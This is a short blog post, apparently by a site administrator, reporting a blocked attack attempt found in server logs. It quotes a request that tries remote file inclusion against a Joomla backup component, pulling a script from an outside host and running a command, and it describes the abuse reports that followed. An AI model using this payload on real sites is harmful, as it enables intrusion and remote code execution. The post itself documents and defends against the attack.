The logs showed up another attempted exploit, very similar to the one in New Hack Attempt

88.242.239.182 - - [27/May/2007:18:40:29 +0100] “GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0″ 403 327 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”


phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that there service is being used by script kiddies.

The originating IP address belongs to the the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced a the complaint.
It looks like another of their IP ranges will have to be blocked.



Write a comment

You need tologin.